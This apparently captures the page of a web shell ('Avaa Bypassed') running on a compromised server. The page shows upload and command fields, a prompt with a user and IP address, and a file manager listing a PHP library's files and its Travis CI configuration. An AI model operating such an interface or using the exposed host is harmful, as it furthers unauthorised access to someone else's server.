404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@3.147.85.238: ~ $
language: php

dist: trusty

matrix:
  include:
    - name: PHP 5.3
      php: 5.3
      dist: precise
    - name: PHP 5.4
      php: 5.4
    - name: PHP 5.5
      php: 5.5
    - name: PHP 5.6
      php: 5.6
    - name: HHVM 3.18
      php: hhvm-3.18

install:
  - travis_retry composer update --prefer-dist --no-progress

script:
  - vendor/bin/phpunit -c tests/phpunit.xml.dist

Filemanager

Name Type Size Permission Actions
.github Folder 0755
generator Folder 0755
hamcrest Folder 0755
tests Folder 0755
.coveralls.yml File 18 B 0644
.gitignore File 21 B 0644
.gush.yml File 184 B 0644
.travis.yml File 380 B 0644
CHANGES.txt File 5.29 KB 0644
LICENSE.txt File 1.45 KB 0644
README.md File 10.67 KB 0644
composer.json File 678 B 0644